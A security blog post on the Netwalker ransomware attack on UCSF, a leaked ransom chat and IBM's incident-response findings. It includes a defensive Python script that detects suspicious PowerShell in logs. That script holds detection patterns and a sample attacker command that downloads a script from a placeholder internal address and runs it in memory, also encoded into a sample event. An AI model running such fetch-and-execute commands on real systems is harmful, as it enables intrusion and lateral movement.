Ransomware: What’s New

Having dealt with ransomware attacks for years, not much surprises me when a new attack is announced. The attack against the University of California San Francisco (UCSF) was no different. The ransomware was a variant called Netwalker, which Sophos analyzed in great detail in May. The threat group deploying this ransomware had already been observed targeting large organizations, with special emphasis on gathering system administrator credentials; the actors then used a variety of mechanisms to move laterally. These could be legitimate remote-access software such as TeamViewer or built-in scripting such as PowerShell, which helped them avoid detection, since both are tools an administrator would run anyway. The Sophos analysis details these mechanisms in the MITRE ATT&CK matrix section of its report. There was also a possibility that the initial infection came via a successful phishing attack. Two pieces of information drew my attention to this attack:

First, the fact that UCSF is a medical facility and that some of the infected servers were in the School of Medicine. UCSF stated that the infection did not affect any of its COVID-19 research, but one has to assume this research was a target. The Netwalker group had not joined the earlier declaration by some cyber criminal groups that they would avoid attacking institutions fighting the coronavirus pandemic.

The second item that really grabbed my attention was that the ransom negotiations between a negotiator acting on behalf of UCSF and the threat group were conducted in a live chat on the dark web. The BBC published what it said were extracts of the chat messages from these negotiations. The BBC said it was alerted to the negotiation by an anonymous tip-off, and the obvious source is the threat group itself: an attempt by the Netwalker group to use the news media to increase pressure on UCSF to pay the ransom.
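The lateral-movement mechanism mentioned above, administrative tooling such as PowerShell, is hard to spot precisely because the same tooling is used legitimately. What follows is an added example, not code from the original post or from Sophos's Netwalker report, of the kind of detection logic a defender can run over process-creation records (Windows event 4688 or Sysmon event 1 style) to flag PowerShell invocations that look like remoting or remote payload execution while leaving an ordinary scheduled script alone. The log format, field names, host names, user names, file paths and the 10.0.0.5 URL are all constructed for the example; the one real detail it relies on is that PowerShell's -EncodedCommand argument is base64 over the UTF-16LE bytes of the script, which is what the decoder below undoes.

```python
"""Flag PowerShell invocations that look like lateral movement in process-creation logs.

Added example for this post, not code from the original article or from Sophos's
Netwalker analysis. Log lines are constructed (simplified key=value records modelled
on Windows 4688 / Sysmon 1 data); host, user, path and URL values are made up.
"""
import base64
import re

# Weak and strong signals. One hit alone (e.g. -ExecutionPolicy Bypass on a
# scheduled backup script) is normal admin noise; two or more, or any encoded
# command at all, is worth a ticket. All patterns are matched case-insensitively.
INDICATORS = [
    ("remoting", r"\b(invoke-command|enter-pssession|new-pssession)\b"),
    ("remote-target", r"-computername\b"),
    ("download", r"downloadstring|downloadfile|invoke-webrequest|\biwr\b"),
    ("in-memory-exec", r"\biex\b|invoke-expression"),
    ("hidden-window", r"-w(?:indowstyle)?\s+hidden"),
    ("no-profile", r"-nop(?:rofile)?\b"),
    ("policy-bypass", r"-e(?:xecutionpolicy|p)\s+bypass"),
]

# -EncodedCommand and its common short forms (-e, -ec, -enc). PowerShell itself
# accepts any unambiguous prefix; this regex covers the forms commonly seen.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def encode_command(script: str) -> str:
    """Encode a script the way 'powershell -EncodedCommand' expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def parse_event(line: str) -> dict:
    """Parse one constructed 'key=value ... cmdline="..."' record into a dict."""
    m = re.search(r'cmdline="([^"]*)"', line)
    rest = line[:m.start()] + line[m.end():] if m else line
    fields = dict(re.findall(r"(\w+)=(\S+)", rest))
    fields["cmdline"] = m.group(1) if m else ""
    return fields


def analyze_event(fields: dict):
    """Score a PowerShell process-creation event; returns None for other images."""
    image = fields.get("image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return None
    cmdline = fields.get("cmdline", "")
    decoded = decode_encoded_command(cmdline)
    # Match against the raw command line AND the decoded payload: encoding is
    # exactly how the interesting part is hidden from a plain string search.
    haystack = cmdline + "\n" + (decoded or "")
    hits = [name for name, pat in INDICATORS if re.search(pat, haystack, re.I)]
    return {
        "host": fields.get("host"),
        "user": fields.get("user"),
        "encoded": decoded is not None,
        "decoded": decoded,
        "indicators": hits,
        "flag": decoded is not None or len(hits) >= 2,
    }


def scan(lines):
    """Return only the flagged findings for a batch of log lines."""
    findings = (analyze_event(parse_event(line)) for line in lines)
    return [f for f in findings if f and f["flag"]]


# Constructed attacker payload: remote in-memory execution of a downloaded script.
LATERAL_SCRIPT = (
    "Invoke-Command -ComputerName SRV01 -ScriptBlock "
    "{IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')}"
)
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (not real telemetry): one non-PowerShell process,
# one benign admin script, one encoded lateral-movement command, one plain remoting call.
SAMPLE_EVENTS = [
    r'host=WS01 user=CORP\jdoe image=C:\Windows\System32\notepad.exe cmdline="notepad.exe report.txt"',
    r'host=WS01 user=CORP\jdoe image=' + PS_IMAGE
    + r' cmdline="powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"',
    r'host=WS01 user=CORP\admin image=' + PS_IMAGE
    + ' cmdline="powershell.exe -nop -w hidden -enc ' + encode_command(LATERAL_SCRIPT) + '"',
    r'host=WS02 user=CORP\admin image=' + PS_IMAGE
    + ' cmdline="powershell.exe Enter-PSSession -ComputerName FS01"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']} {f['user']} encoded={f['encoded']} indicators={f['indicators']}")
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Run as-is, the script flags the encoded command (decoding it so the Invoke-Command and DownloadString inside become visible) and the plain Enter-PSSession call, and leaves the backup script alone because a single -ExecutionPolicy Bypass is not enough on its own. In production the same logic belongs on script block logging (event 4104) as well as process creation, since an attacker who already has admin credentials can also run PowerShell without a suspicious command line.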

This fits the pattern of ransomware groups constantly looking for new revenue streams. Originally they relied primarily on ransom payments to fund further attacks against new victims. Now they also demand money to prevent stolen data from being leaked onto public sites, and there have even been attempts by ransomware actors to embarrass companies long after a breach by reporting it to regulators or other compliance bodies. Any action that can extract money from an organization is on the table. Ransomware will only continue to grow until we make it less lucrative and stop paying these criminals; as long as payments continue, the amounts demanded will continue to rise.

So what can we do? Deploying better tools is one step towards a more secure enterprise, but this is not just about technology. IBM Security just produced a report showing that most organizations already have tools in place, and may in fact have too many. Too much information is as bad as too little, and without a coherent and tested Incident Response Plan any tool set is doomed to fail when a crisis occurs. Some key takeaways from this report:

"First...51% of respondents said that their Computer Security Incident Response Plans (CSIRPs) were informal or ad-hoc, or simply not applied consistently across the enterprise. This lack of consistency translates into real money. Organizations that have incident response teams and extensively test their response plans spend an average of $1.2 million less on data breaches than those who don't have these methods in place, according to IBM."
Second, instead of having too few security products, many organizations have too many. Almost 30% of those polled said they use more than 50 separate security solutions and technologies, while 45% use more than 20 tools to investigate and respond to a cybersecurity incident. Further, many said that each incident to which they responded required coordination across an average of 19 different tools.
Third, even among organizations with a CSIRP, only 33% had playbooks for specific types of attacks. Among those, the most common playbooks were for DDoS attacks and malware. With ransomware on the rise, less than half of organizations with playbooks had one designed for a ransomware attack. Having predefined playbooks to counter common types of attacks provides organizations with a consistent and repeatable plan of defense.

It isn’t about more tools; it is about using the correct tool and becoming expert at that tool. It is about integrated tool sets that are simpler to use and that either provide usable data to the operators or automate some security functions. This is where machine learning analytics will slowly become more useful. The IBM report closes with the following recommendations:

  • Implement an enterprise-wide Computer Security Incident Response Plan (CSIRP) to minimize business disruption
  • Tailor response plans to specific attacks in your industry.
  • Embrace interoperability to increase visibility and reduce complexity
  • Invest in technologies to accelerate incident response
  • Align your security and privacy teams
  • Formalize C-level/board reporting to raise the visibility of the organization’s cyber resilience

Let us all learn from these attacks and not be the next victim. Work with tech companies and partners to ensure that your security tools are actually adding value to your operations.
